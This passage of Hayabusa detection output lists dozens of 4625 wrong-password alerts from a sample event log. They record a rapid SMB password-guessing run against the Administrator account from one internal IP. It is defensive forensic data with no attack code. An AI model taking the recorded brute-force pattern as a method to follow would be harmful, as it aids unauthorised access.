NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ahrOLfdy6DCQ9SfO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xiooSdP5eib8PUE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6nQ2jp9IGYnGeyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejMtyR5QNdJFhw1W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e50kO0aVhfw5np5T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 176XyLw6IhEI6NuD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXCzCSSFvpbWNJFd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhHRuZYlH8hekaKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGIUBFRMQ3OBbOA0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7CTT5g1w58eRRlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmVccmad66uOK9ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t1jlT6kEcs14dcNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBty5jOGkkZSZEyD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Ci7YUsO5MtFkDSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 12JToliq9mmAuMTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lw9AgAvBGWoXBlim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ReGDyvRpGknAKqqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6mdUn8na4asRfpJP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7Wm5p4HnNCbkyh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MQZwerVd6E08X8Ou | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbDjtLKoX5Q77bn5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O7BNKHiPjzJKCaDk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHqBI8bzZn5VO9gq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xz2ZO3b3QSh6Rdqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEfdhrwbTfCpCXKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kc0LuQzAmQTIF1X3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WMZ70YmzpVp2h8mY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FFVr3Amq6mA3umiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnN15vqZcww8pqTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSuMRF1txQ9g2Mwi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tUuapChhs4CGO1cS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIMr0hjIkwD8AaEG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ww9HMQX0cqmolYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJRRZ5e9lARVZDar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvUzVoSLqFPAXSWE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SMMgPu1VJIjAWPDW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1JjIa4nOKDTLuAD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0J0GJIm1UUXHH9QJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YmVX3xIz0hrQFvPr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nv4tKFEmHjiXkVDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdHHJl9LBek9pIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MWofwwLjwiyBk39P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dvsHFZe7Z1uJ9Dkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aDdgwvb1zsZF79k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQUb6CnMUtyrMNhF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KP5OxHPsbLHnIUBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: 